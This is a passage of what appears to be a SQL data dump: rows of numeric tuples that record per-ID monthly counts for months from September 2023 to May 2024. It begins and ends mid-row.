06),(80,2,'202309',290),(9,2,'202309',1816),(110,2,'202402',4),(106,2,'202402',5),(2993,2,'202402',9),(4878,2,'202402',9),(3265,2,'202402',10),(3267,2,'202402',10),(4436,2,'202402',10),(4444,2,'202402',10),(4802,2,'202402',10),(4883,2,'202402',10),(4983,2,'202402',10),(5024,2,'202402',10),(5153,2,'202402',10),(1695,2,'202402',11),(1703,2,'202402',11),(1705,2,'202402',11),(1718,2,'202402',11),(1720,2,'202402',11),(1730,2,'202402',11),(1739,2,'202402',11),(2248,2,'202402',11),(2252,2,'202402',11),(2296,2,'202402',11),(2991,2,'202402',11),(3107,2,'202402',11),(3243,2,'202402',11),(3251,2,'202402',11),(3263,2,'202402',11),(3269,2,'202402',11),(3278,2,'202402',11),(3731,2,'202402',11),(4591,2,'202402',11),(4608,2,'202402',11),(4657,2,'202402',11),(4668,2,'202402',11),(4681,2,'202402',11),(4688,2,'202402',11),(4706,2,'202402',11),(4858,2,'202402',11),(4870,2,'202402',11),(4874,2,'202402',11),(5020,2,'202402',11),(5042,2,'202402',11),(5046,2,'202402',11),(5248,2,'202402',11),(1707,2,'202402',12),(1715,2,'202402',12),(1726,2,'202402',12),(1745,2,'202402',12),(1747,2,'202402',12),(2956,2,'202402',12),(3072,2,'202402',12),(3087,2,'202402',12),(3097,2,'202402',12),(3240,2,'202402',12),(3245,2,'202402',12),(3249,2,'202402',12),(3275,2,'202402',12),(3287,2,'202402',12),(3307,2,'202402',12),(3486,2,'202402',12),(3721,2,'202402',12),(3727,2,'202402',12),(3735,2,'202402',12),(3738,2,'202402',12),(4332,2,'202402',12),(4363,2,'202402',12),(4368,2,'202402',12),(4382,2,'202402',12),(4428,2,'202402',12),(4546,2,'202402',12),(4556,2,'202402',12),(4587,2,'202402',12),(4694,2,'202402',12),(4703,2,'202402',12),(4722,2,'202402',12),(4762,2,'202402',12),(4888,2,'202402',12),(4897,2,'202402',12),(4988,2,'202402',12),(5122,2,'202402',12),(5137,2,'202402',12),(5253,2,'202402',12),(5326,2,'202402',12),(5383,2,'202402',12),(102,2,'202402',13),(1697,2,'202402',13),(1711,2,'202402',13),(1770,2,'202402',13),(2293,2,'202402',13),(2748,2,'202402',13),(2769,2,'202402',13),(3034,2,'202402',13),(3079,2,'202402',13),(3096,2,'202402',13),(3104,2,'202402',13),(3109,2,'202402',13),(3127,2,'202402',13),(3229,2,'202402',13),(3273,2,'202402',13),(3280,2,'202402',13),(3313,2,'202402',13),(3498,2,'202402',13),(3724,2,'202402',13),(3746,2,'202402',13),(4275,2,'202402',13),(4329,2,'202402',13),(4341,2,'202402',13),(4404,2,'202402',13),(4408,2,'202402',13),(4432,2,'202402',13),(4691,2,'202402',13),(4697,2,'202402',13),(4712,2,'202402',13),(4741,2,'202402',13),(4756,2,'202402',13),(4759,2,'202402',13),(4768,2,'202402',13),(4792,2,'202402',13),(4797,2,'202402',13),(4862,2,'202402',13),(4893,2,'202402',13),(4976,2,'202402',13),(4980,2,'202402',13),(5037,2,'202402',13),(5054,2,'202402',13),(5062,2,'202402',13),(5140,2,'202402',13),(1590,2,'202402',14),(1701,2,'202402',14),(1724,2,'202402',14),(1751,2,'202402',14),(1766,2,'202402',14),(1782,2,'202402',14),(2152,2,'202402',14),(2161,2,'202402',14),(2165,2,'202402',14),(2609,2,'202402',14),(2658,2,'202402',14),(3023,2,'202402',14),(3092,2,'202402',14),(3124,2,'202402',14),(3259,2,'202402',14),(3290,2,'202402',14),(3482,2,'202402',14),(3531,2,'202402',14),(3714,2,'202402',14),(3771,2,'202402',14),(3774,2,'202402',14),(4326,2,'202402',14),(4373,2,'202402',14),(4387,2,'202402',14),(4440,2,'202402',14),(4448,2,'202402',14),(4514,2,'202402',14),(4542,2,'202402',14),(4651,2,'202402',14),(4660,2,'202402',14),(4744,2,'202402',14),(4747,2,'202402',14),(5028,2,'202402',14),(5033,2,'202402',14),(5067,2,'202402',14),(5080,2,'202402',14),(5125,2,'202402',14),(5134,2,'202402',14),(5256,2,'202402',14),(5280,2,'202402',14),(5289,2,'202402',14),(5298,2,'202402',14),(5307,2,'202402',14),(5374,2,'202402',14),(5378,2,'202402',14),(570,2,'202402',15),(1713,2,'202402',15),(1728,2,'202402',15),(1732,2,'202402',15),(2154,2,'202402',15),(2558,2,'202402',15),(2751,2,'202402',15),(2989,2,'202402',15),(3257,2,'202402',15),(3316,2,'202402',15),(3541,2,'202402',15),(3742,2,'202402',15),(3749,2,'202402',15),(3752,2,'202402',15),(4412,2,'202402',15),(4654,2,'202402',15),(4776,2,'202402',15),(5050,2,'202402',15),(5058,2,'202402',15),(5128,2,'202402',15),(5146,2,'202402',15),(5157,2,'202402',15),(5264,2,'202402',15),(5271,2,'202402',15),(5301,2,'202402',15),(5304,2,'202402',15),(5320,2,'202402',15),(5323,2,'202402',15),(477,2,'202402',16),(478,2,'202402',16),(1604,2,'202402',16),(1610,2,'202402',16),(1709,2,'202402',16),(1772,2,'202402',16),(1778,2,'202402',16),(2063,2,'202402',16),(2150,2,'202402',16),(2156,2,'202402',16),(2159,2,'202402',16),(2704,2,'202402',16),(2813,2,'202402',16),(2965,2,'202402',16),(3005,2,'202402',16),(3038,2,'202402',16),(3045,2,'202402',16),(3117,2,'202402',16),(3253,2,'202402',16),(3261,2,'202402',16),(3430,2,'202402',16),(3534,2,'202402',16),(3777,2,'202402',16),(4323,2,'202402',16),(4335,2,'202402',16),(4391,2,'202402',16),(4424,2,'202402',16),(4566,2,'202402',16),(4582,2,'202402',16),(4700,2,'202402',16),(4709,2,'202402',16),(4753,2,'202402',16),(4866,2,'202402',16),(4996,2,'202402',16),(5292,2,'202402',16),(5310,2,'202402',16),(5317,2,'202402',16),(480,2,'202402',17),(482,2,'202402',17),(1584,2,'202402',17),(1588,2,'202402',17),(1722,2,'202402',17),(1776,2,'202402',17),(1780,2,'202402',17),(2178,2,'202402',17),(2617,2,'202402',17),(2775,2,'202402',17),(3027,2,'202402',17),(3063,2,'202402',17),(3083,2,'202402',17),(3090,2,'202402',17),(3226,2,'202402',17),(3271,2,'202402',17),(3282,2,'202402',17),(3438,2,'202402',17),(4400,2,'202402',17),(4420,2,'202402',17),(4457,2,'202402',17),(4524,2,'202402',17),(4750,2,'202402',17),(4771,2,'202402',17),(5259,2,'202402',17),(5276,2,'202402',17),(5295,2,'202402',17),(472,2,'202402',18),(481,2,'202402',18),(483,2,'202402',18),(484,2,'202402',18),(488,2,'202402',18),(1608,2,'202402',18),(1737,2,'202402',18),(2297,2,'202402',18),(2804,2,'202402',18),(3285,2,'202402',18),(3479,2,'202402',18),(4612,2,'202402',18),(4677,2,'202402',18),(479,2,'202402',19),(1600,2,'202402',19),(1606,2,'202402',19),(1741,2,'202402',19),(2911,2,'202402',19),(2964,2,'202402',19),(3102,2,'202402',19),(3710,2,'202402',19),(4238,2,'202402',19),(4377,2,'202402',19),(4416,2,'202402',19),(4454,2,'202402',19),(4517,2,'202402',19),(4529,2,'202402',19),(4685,2,'202402',19),(5363,2,'202402',19),(467,2,'202402',20),(476,2,'202402',20),(485,2,'202402',20),(1774,2,'202402',20),(2801,2,'202402',20),(2809,2,'202402',20),(3004,2,'202402',20),(3006,2,'202402',20),(3041,2,'202402',20),(3489,2,'202402',20),(4396,2,'202402',20),(4765,2,'202402',20),(5071,2,'202402',20),(5268,2,'202402',20),(5314,2,'202402',20),(5330,2,'202402',20),(469,2,'202402',21),(1544,2,'202402',21),(2309,2,'202402',21),(4338,2,'202402',21),(4674,2,'202402',21),(471,2,'202402',22),(486,2,'202402',22),(1612,2,'202402',22),(1743,2,'202402',22),(3069,2,'202402',22),(4551,2,'202402',22),(5076,2,'202402',22),(5131,2,'202402',22),(1749,2,'202402',23),(1768,2,'202402',23),(5101,2,'202402',23),(1598,2,'202402',24),(1614,2,'202402',24),(1699,2,'202402',24),(4301,2,'202402',24),(4663,2,'202402',24),(3297,2,'202402',25),(1602,2,'202402',26),(2148,2,'202402',26),(4357,2,'202402',26),(4648,2,'202402',26),(468,2,'202402',27),(487,2,'202402',27),(3030,2,'202402',28),(4977,2,'202402',28),(1592,2,'202402',29),(1594,2,'202402',29),(1734,2,'202402',30),(4520,2,'202402',30),(4645,2,'202402',30),(5353,2,'202402',30),(5356,2,'202402',31),(74,2,'202402',32),(474,2,'202402',33),(5334,2,'202402',33),(3764,2,'202402',34),(5359,2,'202402',35),(3066,2,'202402',36),(1586,2,'202402',37),(2457,2,'202402',37),(87,2,'202402',38),(3247,2,'202402',38),(1582,2,'202402',39),(84,2,'202402',42),(335,2,'202402',42),(108,2,'202402',43),(3781,2,'202402',45),(1596,2,'202402',47),(3060,2,'202402',47),(2904,2,'202402',49),(76,2,'202402',50),(470,2,'202402',50),(473,2,'202402',50),(2503,2,'202402',50),(5163,2,'202402',51),(4930,2,'202402',52),(91,2,'202402',62),(72,2,'202402',94),(89,2,'202402',95),(68,2,'202402',107),(80,2,'202402',433),(9,2,'202402',10033),(486,2,'202403',1),(5033,2,'202403',1),(5067,2,'202403',1),(5326,2,'202403',1),(5378,2,'202403',1),(476,2,'202403',2),(482,2,'202403',2),(485,2,'202403',2),(1604,2,'202403',2),(1774,2,'202403',2),(2063,2,'202403',2),(2150,2,'202403',2),(2704,2,'202403',2),(2775,2,'202403',2),(3027,2,'202403',2),(3041,2,'202403',2),(3072,2,'202403',2),(3097,2,'202403',2),(3257,2,'202403',2),(3263,2,'202403',2),(3267,2,'202403',2),(3271,2,'202403',2),(3438,2,'202403',2),(4377,2,'202403',2),(4387,2,'202403',2),(4391,2,'202403',2),(4400,2,'202403',2),(4694,2,'202403',2),(4858,2,'202403',2),(4862,2,'202403',2),(4883,2,'202403',2),(4893,2,'202403',2),(5037,2,'202403',2),(5058,2,'202403',2),(5153,2,'202403',2),(5157,2,'202403',2),(5259,2,'202403',2),(5363,2,'202403',2),(102,2,'202403',3),(106,2,'202403',3),(108,2,'202403',3),(335,2,'202403',3),(481,2,'202403',3),(483,2,'202403',3),(484,2,'202403',3),(1584,2,'202403',3),(1588,2,'202403',3),(1610,2,'202403',3),(1707,2,'202403',3),(1709,2,'202403',3),(1715,2,'202403',3),(1718,2,'202403',3),(1730,2,'202403',3),(1732,2,'202403',3),(1734,2,'202403',3),(1737,2,'202403',3),(1745,2,'202403',3),(1747,2,'202403',3),(1768,2,'202403',3),(1778,2,'202403',3),(2152,2,'202403',3),(2154,2,'202403',3),(2156,2,'202403',3),(2248,2,'202403',3),(2293,2,'202403',3),(2769,2,'202403',3),(2804,2,'202403',3),(2911,2,'202403',3),(2965,2,'202403',3),(2989,2,'202403',3),(2993,2,'202403',3),(3079,2,'202403',3),(3092,2,'202403',3),(3096,2,'202403',3),(3127,2,'202403',3),(3240,2,'202403',3),(3243,2,'202403',3),(3259,2,'202403',3),(3269,2,'202403',3),(3273,2,'202403',3),(3313,2,'202403',3),(3482,2,'202403',3),(3498,2,'202403',3),(3727,2,'202403',3),(3742,2,'202403',3),(3752,2,'202403',3),(3774,2,'202403',3),(4301,2,'202403',3),(4323,2,'202403',3),(4326,2,'202403',3),(4368,2,'202403',3),(4382,2,'202403',3),(4542,2,'202403',3),(4556,2,'202403',3),(4587,2,'202403',3),(4612,2,'202403',3),(4706,2,'202403',3),(4747,2,'202403',3),(4792,2,'202403',3),(4797,2,'202403',3),(4802,2,'202403',3),(4878,2,'202403',3),(4888,2,'202403',3),(4897,2,'202403',3),(5054,2,'202403',3),(5062,2,'202403',3),(5122,2,'202403',3),(5134,2,'202403',3),(5248,2,'202403',3),(5320,2,'202403',3),(5323,2,'202403',3),(5383,2,'202403',3),(469,2,'202403',4),(1606,2,'202403',4),(1697,2,'202403',4),(1713,2,'202403',4),(1739,2,'202403',4),(1741,2,'202403',4),(1782,2,'202403',4),(2617,2,'202403',4),(2658,2,'202403',4),(2801,2,'202403',4),(3034,2,'202403',4),(3104,2,'202403',4),(3109,2,'202403',4),(3117,2,'202403',4),(3245,2,'202403',4),(3278,2,'202403',4),(3479,2,'202403',4),(3531,2,'202403',4),(3714,2,'202403',4),(3721,2,'202403',4),(3724,2,'202403',4),(3735,2,'202403',4),(3749,2,'202403',4),(3777,2,'202403',4),(4341,2,'202403',4),(4408,2,'202403',4),(4514,2,'202403',4),(4529,2,'202403',4),(4566,2,'202403',4),(4591,2,'202403',4),(4608,2,'202403',4),(4681,2,'202403',4),(4688,2,'202403',4),(4691,2,'202403',4),(4712,2,'202403',4),(4722,2,'202403',4),(4744,2,'202403',4),(4765,2,'202403',4),(4768,2,'202403',4),(4874,2,'202403',4),(4980,2,'202403',4),(5024,2,'202403',4),(5253,2,'202403',4),(5264,2,'202403',4),(5271,2,'202403',4),(5292,2,'202403',4),(5295,2,'202403',4),(5304,2,'202403',4),(5317,2,'202403',4),(5356,2,'202403',4),(472,2,'202403',5),(473,2,'202403',5),(479,2,'202403',5),(488,2,'202403',5),(1590,2,'202403',5),(1598,2,'202403',5),(1695,2,'202403',5),(1701,2,'202403',5),(1703,2,'202403',5),(1711,2,'202403',5),(1720,2,'202403',5),(1751,2,'202403',5),(2159,2,'202403',5),(2178,2,'202403',5),(2252,2,'202403',5),(2503,2,'202403',5),(2991,2,'202403',5),(3045,2,'202403',5),(3124,2,'202403',5),(3226,2,'202403',5),(3253,2,'202403',5),(3282,2,'202403',5),(3307,2,'202403',5),(3534,2,'202403',5),(3710,2,'202403',5),(3746,2,'202403',5),(4275,2,'202403',5),(4329,2,'202403',5),(4404,2,'202403',5),(4420,2,'202403',5),(4424,2,'202403',5),(4432,2,'202403',5),(4546,2,'202403',5),(4582,2,'202403',5),(4668,2,'202403',5),(4703,2,'202403',5),(4741,2,'202403',5),(4753,2,'202403',5),(4756,2,'202403',5),(4762,2,'202403',5),(5020,2,'202403',5),(5071,2,'202403',5),(5128,2,'202403',5),(5140,2,'202403',5),(5256,2,'202403',5),(5276,2,'202403',5),(5301,2,'202403',5),(5310,2,'202403',5),(5334,2,'202403',5),(5353,2,'202403',5),(5359,2,'202403',5),(87,2,'202403',6),(110,2,'202403',6),(478,2,'202403',6),(1600,2,'202403',6),(1608,2,'202403',6),(1770,2,'202403',6),(2296,2,'202403',6),(2751,2,'202403',6),(3023,2,'202403',6),(3087,2,'202403',6),(3229,2,'202403',6),(3280,2,'202403',6),(3287,2,'202403',6),(3316,2,'202403',6),(3738,2,'202403',6),(4338,2,'202403',6),(4440,2,'202403',6),(4444,2,'202403',6),(4448,2,'202403',6),(4454,2,'202403',6),(4524,2,'202403',6),(4651,2,'202403',6),(4657,2,'202403',6),(4660,2,'202403',6),(4697,2,'202403',6),(4709,2,'202403',6),(4977,2,'202403',6),(4988,2,'202403',6),(5042,2,'202403',6),(5101,2,'202403',6),(5146,2,'202403',6),(474,2,'202403',7),(1544,2,'202403',7),(1726,2,'202403',7),(1728,2,'202403',7),(1776,2,'202403',7),(2748,2,'202403',7),(2813,2,'202403',7),(2956,2,'202403',7),(3038,2,'202403',7),(3063,2,'202403',7),(3090,2,'202403',7),(3275,2,'202403',7),(3541,2,'202403',7),(4648,2,'202403',7),(4750,2,'202403',7),(4870,2,'202403',7),(5080,2,'202403',7),(5137,2,'202403',7),(5298,2,'202403',7),(467,2,'202403',8),(570,2,'202403',8),(1705,2,'202403',8),(1724,2,'202403',8),(3005,2,'202403',8),(3006,2,'202403',8),(3265,2,'202403',8),(3285,2,'202403',8),(3290,2,'202403',8),(3731,2,'202403',8),(3771,2,'202403',8),(4373,2,'202403',8),(4428,2,'202403',8),(4436,2,'202403',8),(4457,2,'202403',8),(4677,2,'202403',8),(4771,2,'202403',8),(4776,2,'202403',8),(4976,2,'202403',8),(5280,2,'202403',8),(480,2,'202403',9),(1743,2,'202403',9),(1780,2,'202403',9),(2165,2,'202403',9),(2558,2,'202403',9),(2609,2,'202403',9),(3107,2,'202403',9),(3251,2,'202403',9),(3486,2,'202403',9),(4363,2,'202403',9),(4517,2,'202403',9),(5268,2,'202403',9),(74,2,'202403',10),(84,2,'202403',10),(2297,2,'202403',10),(4238,2,'202403',10),(4416,2,'202403',10),(4654,2,'202403',10),(4983,2,'202403',10),(4996,2,'202403',10),(5028,2,'202403',10),(5125,2,'202403',10),(5289,2,'202403',10),(5307,2,'202403',10),(468,2,'202403',11),(1766,2,'202403',11),(3249,2,'202403',11),(4357,2,'202403',11),(4663,2,'202403',11),(5314,2,'202403',11),(2309,2,'202403',12),(2904,2,'202403',12),(4332,2,'202403',12),(4674,2,'202403',12),(5046,2,'202403',12),(2161,2,'202403',13),(2809,2,'202403',13),(3083,2,'202403',13),(3102,2,'202403',13),(3297,2,'202403',13),(4520,2,'202403',13),(4866,2,'202403',13),(5374,2,'202403',13),(76,2,'202403',14),(91,2,'202403',14),(3030,2,'202403',14),(4335,2,'202403',14),(4396,2,'202403',14),(471,2,'202403',15),(487,2,'202403',15),(2964,2,'202403',15),(5050,2,'202403',15),(5330,2,'202403',15),(3069,2,'202403',16),(5131,2,'202403',16),(477,2,'202403',17),(3489,2,'202403',17),(4700,2,'202403',17),(1592,2,'202403',18),(3004,2,'202403',18),(3060,2,'202403',18),(3430,2,'202403',18),(4685,2,'202403',18),(3261,2,'202403',19),(3764,2,'202403',19),(1749,2,'202403',20),(2457,2,'202403',20),(72,2,'202403',21),(1772,2,'202403',21),(3066,2,'202403',21),(4645,2,'202403',21),(4759,2,'202403',21),(4930,2,'202403',22),(1612,2,'202403',23),(1699,2,'202403',24),(5076,2,'202403',24),(1722,2,'202403',25),(1602,2,'202403',28),(89,2,'202403',29),(4551,2,'202403',32),(1582,2,'202403',35),(1594,2,'202403',35),(470,2,'202403',37),(1614,2,'202403',38),(4412,2,'202403',38),(5163,2,'202403',38),(2148,2,'202403',49),(1596,2,'202403',57),(3781,2,'202403',68),(3247,2,'202403',76),(1586,2,'202403',81),(68,2,'202403',86),(80,2,'202403',324),(9,2,'202403',36748),(106,2,'202404',1),(2293,2,'202404',1),(2296,2,'202404',1),(5042,2,'202404',1),(5122,2,'202404',1),(5134,2,'202404',1),(5326,2,'202404',1),(5383,2,'202404',1),(1584,2,'202404',2),(1695,2,'202404',2),(1701,2,'202404',2),(1705,2,'202404',2),(1726,2,'202404',2),(1751,2,'202404',2),(1774,2,'202404',2),(2252,2,'202404',2),(2956,2,'202404',2),(2991,2,'202404',2),(3087,2,'202404',2),(3092,2,'202404',2),(3127,2,'202404',2),(3263,2,'202404',2),(3273,2,'202404',2),(3275,2,'202404',2),(3278,2,'202404',2),(3280,2,'202404',2),(3287,2,'202404',2),(3313,2,'202404',2),(3486,2,'202404',2),(3721,2,'202404',2),(3724,2,'202404',2),(4275,2,'202404',2),(4326,2,'202404',2),(4382,2,'202404',2),(4396,2,'202404',2),(4454,2,'202404',2),(4587,2,'202404',2),(4591,2,'202404',2),(4612,2,'202404',2),(4657,2,'202404',2),(4660,2,'202404',2),(4691,2,'202404',2),(4694,2,'202404',2),(4700,2,'202404',2),(4706,2,'202404',2),(4712,2,'202404',2),(4750,2,'202404',2),(4870,2,'202404',2),(4897,2,'202404',2),(5020,2,'202404',2),(5037,2,'202404',2),(5058,2,'202404',2),(5071,2,'202404',2),(5101,2,'202404',2),(5146,2,'202404',2),(5153,2,'202404',2),(5276,2,'202404',2),(5292,2,'202404',2),(5298,2,'202404',2),(5307,2,'202404',2),(5317,2,'202404',2),(5320,2,'202404',2),(5323,2,'202404',2),(5353,2,'202404',2),(1707,2,'202404',3),(1713,2,'202404',3),(1730,2,'202404',3),(1737,2,'202404',3),(1739,2,'202404',3),(1741,2,'202404',3),(1747,2,'202404',3),(1768,2,'202404',3),(1778,2,'202404',3),(2150,2,'202404',3),(2248,2,'202404',3),(2911,2,'202404',3),(2993,2,'202404',3),(3038,2,'202404',3),(3045,2,'202404',3),(3063,2,'202404',3),(3104,2,'202404',3),(3109,2,'202404',3),(3229,2,'202404',3),(3240,2,'202404',3),(3269,2,'202404',3),(3271,2,'202404',3),(3297,2,'202404',3),(3479,2,'202404',3),(3541,2,'202404',3),(3738,2,'202404',3),(3742,2,'202404',3),(3746,2,'202404',3),(3749,2,'202404',3),(3752,2,'202404',3),(3777,2,'202404',3),(4332,2,'202404',3),(4335,2,'202404',3),(4341,2,'202404',3),(4357,2,'202404',3),(4373,2,'202404',3),(4377,2,'202404',3),(4424,2,'202404',3),(4436,2,'202404',3),(4440,2,'202404',3),(4514,2,'202404',3),(4524,2,'202404',3),(4546,2,'202404',3),(4566,2,'202404',3),(4582,2,'202404',3),(4648,2,'202404',3),(4663,2,'202404',3),(4668,2,'202404',3),(4681,2,'202404',3),(4688,2,'202404',3),(4709,2,'202404',3),(4722,2,'202404',3),(4744,2,'202404',3),(4756,2,'202404',3),(4883,2,'202404',3),(4893,2,'202404',3),(4988,2,'202404',3),(5128,2,'202404',3),(5301,2,'202404',3),(5310,2,'202404',3),(5314,2,'202404',3),(5334,2,'202404',3),(5363,2,'202404',3),(5374,2,'202404',3),(102,2,'202404',4),(108,2,'202404',4),(110,2,'202404',4),(1699,2,'202404',4),(1703,2,'202404',4),(1718,2,'202404',4),(1722,2,'202404',4),(1732,2,'202404',4),(1734,2,'202404',4),(1772,2,'202404',4),(1782,2,'202404',4),(2178,2,'202404',4),(3034,2,'202404',4),(3072,2,'202404',4),(3096,2,'202404',4),(3107,2,'202404',4),(3243,2,'202404',4),(3316,2,'202404',4),(3438,2,'202404',4),(3482,2,'202404',4),(3498,2,'202404',4),(3531,2,'202404',4),(3710,2,'202404',4),(3714,2,'202404',4),(3731,2,'202404',4),(3774,2,'202404',4),(4238,2,'202404',4),(4323,2,'202404',4),(4338,2,'202404',4),(4368,2,'202404',4),(4391,2,'202404',4),(4404,2,'202404',4),(4428,2,'202404',4),(4432,2,'202404',4),(4448,2,'202404',4),(4608,2,'202404',4),(4741,2,'202404',4),(4747,2,'202404',4),(4976,2,'202404',4),(4977,2,'202404',4),(4980,2,'202404',4),(5028,2,'202404',4),(5046,2,'202404',4),(5054,2,'202404',4),(5131,2,'202404',4),(5259,2,'202404',4),(5295,2,'202404',4),(5356,2,'202404',4),(480,2,'202404',5),(483,2,'202404',5),(1697,2,'202404',5),(1711,2,'202404',5),(1715,2,'202404',5),(1720,2,'202404',5),(1728,2,'202404',5),(1745,2,'202404',5),(2063,2,'202404',5),(2156,2,'202404',5),(2617,2,'202404',5),(2658,2,'202404',5),(2989,2,'202404',5),(3027,2,'202404',5),(3083,2,'202404',5),(3251,2,'202404',5),(3261,2,'202404',5),(3285,2,'202404',5),(3489,2,'202404',5),(4329,2,'202404',5),(4400,2,'202404',5),(4444,2,'202404',5),(4697,2,'202404',5),(4703,2,'202404',5),(4753,2,'202404',5),(4858,2,'202404',5),(4862,2,'202404',5),(4874,2,'202404',5),(4878,2,'202404',5),(4888,2,'202404',5),(5024,2,'202404',5),(5140,2,'202404',5),(5264,2,'202404',5),(5280,2,'202404',5),(5359,2,'202404',5),(5378,2,'202404',5),(482,2,'202404',6),(484,2,'202404',6),(2152,2,'202404',6),(2161,2,'202404',6),(2704,2,'202404',6),(2751,2,'202404',6),(2769,2,'202404',6),(3249,2,'202404',6),(3257,2,'202404',6),(3259,2,'202404',6),(3267,2,'202404',6),(3534,2,'202404',6),(3735,2,'202404',6),(4408,2,'202404',6),(4762,2,'202404',6),(5137,2,'202404',6),(5157,2,'202404',6),(5268,2,'202404',6),(5304,2,'202404',6),(486,2,'202404',7),(1590,2,'202404',7),(1776,2,'202404',7),(2457,2,'202404',7),(2503,2,'202404',7),(2775,2,'202404',7),(2801,2,'202404',7),(2804,2,'202404',7),(2813,2,'202404',7),(3030,2,'202404',7),(3117,2,'202404',7),(3124,2,'202404',7),(3253,2,'202404',7),(3290,2,'202404',7),(3430,2,'202404',7),(3727,2,'202404',7),(4420,2,'202404',7),(4542,2,'202404',7),(4759,2,'202404',7),(4797,2,'202404',7),(5033,2,'202404',7),(5248,2,'202404',7),(5330,2,'202404',7),(467,2,'202404',8),(472,2,'202404',8),(478,2,'202404',8),(479,2,'202404',8),(481,2,'202404',8),(487,2,'202404',8),(1588,2,'202404',8),(1608,2,'202404',8),(1612,2,'202404',8),(1709,2,'202404',8),(1780,2,'202404',8),(2159,2,'202404',8),(3006,2,'202404',8),(3226,2,'202404',8),(3282,2,'202404',8),(4387,2,'202404',8),(4412,2,'202404',8),(4802,2,'202404',8),(5067,2,'202404',8),(76,2,'202404',9),(485,2,'202404',9),(488,2,'202404',9),(570,2,'202404',9),(1604,2,'202404',9),(1606,2,'202404',9),(1610,2,'202404',9),(2558,2,'202404',9),(3004,2,'202404',9),(3079,2,'202404',9),(3090,2,'202404',9),(3307,2,'202404',9),(4529,2,'202404',9),(4556,2,'202404',9),(4768,2,'202404',9),(4792,2,'202404',9),(4996,2,'202404',9),(5125,2,'202404',9),(5271,2,'202404',9),(335,2,'202404',10),(469,2,'202404',10),(477,2,'202404',10),(1592,2,'202404',10),(1596,2,'202404',10),(2609,2,'202404',10),(2748,2,'202404',10),(3041,2,'202404',10),(3102,2,'202404',10),(4520,2,'202404',10),(4551,2,'202404',10),(4651,2,'202404',10),(4685,2,'202404',10),(4930,2,'202404',10),(4983,2,'202404',10),(5062,2,'202404',10),(5253,2,'202404',10),(5256,2,'202404',10),(74,2,'202404',11),(84,2,'202404',11),(470,2,'202404',11),(473,2,'202404',11),(1724,2,'202404',11),(2154,2,'202404',11),(2297,2,'202404',11),(2964,2,'202404',11),(2965,2,'202404',11),(3023,2,'202404',11),(3097,2,'202404',11),(3245,2,'202404',11),(5080,2,'202404',11),(4645,2,'202404',12),(4654,2,'202404',12),(4771,2,'202404',12),(468,2,'202404',13),(476,2,'202404',13),(1614,2,'202404',13),(1743,2,'202404',13),(1766,2,'202404',13),(4677,2,'202404',13),(91,2,'202404',14),(474,2,'202404',14),(1594,2,'202404',14),(1598,2,'202404',14),(1602,2,'202404',14),(3764,2,'202404',14),(4416,2,'202404',14),(4776,2,'202404',14),(471,2,'202404',15),(4363,2,'202404',15),(4674,2,'202404',15),(4765,2,'202404',15),(5289,2,'202404',15),(1770,2,'202404',16),(2309,2,'202404',16),(3060,2,'202404',16),(3771,2,'202404',16),(4457,2,'202404',17),(5076,2,'202404',17),(3265,2,'202404',18),(4301,2,'202404',18),(1600,2,'202404',19),(2165,2,'202404',19),(2904,2,'202404',19),(4866,2,'202404',19),(5163,2,'202404',19),(3005,2,'202404',21),(72,2,'202404',22),(1749,2,'202404',22),(2809,2,'202404',22),(3066,2,'202404',24),(5050,2,'202404',24),(3069,2,'202404',26),(89,2,'202404',28),(1544,2,'202404',29),(87,2,'202404',30),(1582,2,'202404',32),(4517,2,'202404',33),(3781,2,'202404',37),(68,2,'202404',40),(1586,2,'202404',52),(2148,2,'202404',53),(3247,2,'202404',79),(80,2,'202404',287),(9,2,'202404',39367),(476,2,'202405',1),(478,2,'202405',1),(483,2,'202405',1),(484,2,'202405',1),(486,2,'202405',1),(1588,2,'202405',1),(1598,2,'202405',1),(1612,2,'202405',1),(1705,2,'202405',1),(1715,2,'202405',1),(1720,2,'202405',1),(1730,2,'202405',1),(1739,2,'202405',1),(1751,2,'202405',1),(1768,2,'202405',1),(1772,2,'202405',1),(1774,2,'202405',1),(1778,2,'202405',1),(2161,2,'202405',1),(2248,2,'202405',1),(2252,2,'202405',1),(2293,2,'202405',1),(2296,2,'202405',1),(2297,2,'202405',1),(2617,2,'202405',1),(2658,2,'202405',1),(2989,2,'202405',1),(3027,2,'202405',1),(3038,2,'202405',1),(3072,2,'202405',1),(3079,2,'202405',1),(3092,2,'202405',1),(3097,2,'202405',1),(3109,2,'202405',1),(3226,2,'202405',1),(3229,2,'202405',1),(3269,2,'202405',1),(3278,2,'202405',1),(3280,2,'202405',1),(3287,2,'202405',1),(3316,2,'202405',1),(3430,2,'202405',1),(3482,2,'202405',1),(3486,2,'202405',1),(3534,2,'202405',1),(3721,2,'202405',1),(3731,2,'202405',1),(3735,2,'202405',1),(4275,2,'202405',1),(4326,2,'202405',1),(4335,2,'202405',1),(4338,2,'202405',1),(4357,2,'202405',1),(4373,2,'202405',1),(4377,2,'202405',1),(4387,2,'202405',1),(4400,2,'202405',1),(4424,2,'202405',1),(4428,2,'202405',1),(4432,2,'202405',1),(4514,2,'202405',1),(4517,2,'202405',1),(4608,2,'202405',1),(4612,2,'202405',1),(4651,2,'202405',1),(4654,2,'202405',1),(4700,2,'202405',1),(4706,2,'202405',1),(4768,2,'202405',1),(4797,2,'202405',1),(4870,2,'202405',1),(4878,2,'202405',1),(4888,2,'202405',1),(5157,2,'202405',1),(5256,2,'202405',1),(5271,2,'202405',1),(5330,2,'202405',1),(5363,2,'202405',1),(102,2,'202405',2),(469,2,'202405',2),(480,2,'202405',2),(481,2,'202405',2),(485,2,'202405',2),(1592,2,'202405',2),(1606,2,'202405',2),(1695,2,'202405',2),(1697,2,'202405',2),(1703,2,'202405',2),(1707,2,'202405',2),(1713,2,'202405',2),(1718,2,'202405',2),(1722,2,'202405',2),(1737,2,'202405',2),(1741,2,'202405',2),(2150,2,'202405',2),(2178,2,'202405',2),(2748,2,'202405',2),(2911,2,'202405',2),(2964,2,'202405',2),(3006,2,'202405',2),(3066,2,'202405',2),(3090,2,'202405',2),(3096,2,'202405',2),(3102,2,'202405',2),(3124,2,'202405',2),(3243,2,'202405',2),(3257,2,'202405',2),(3263,2,'202405',2),(3282,2,'202405',2),(3290,2,'202405',2),(3297,2,'202405',2),(3307,2,'202405',2),(3727,2,'202405',2),(3774,2,'202405',2),(4332,2,'202405',2),(4341,2,'202405',2),(4363,2,'202405',2),(4391,2,'202405',2),(4436,2,'202405',2),(4440,2,'202405',2),(4448,2,'202405',2),(4454,2,'202405',2),(4542,2,'202405',2),(4566,2,'202405',2),(4587,2,'202405',2),(4648,2,'202405',2),(4657,2,'20240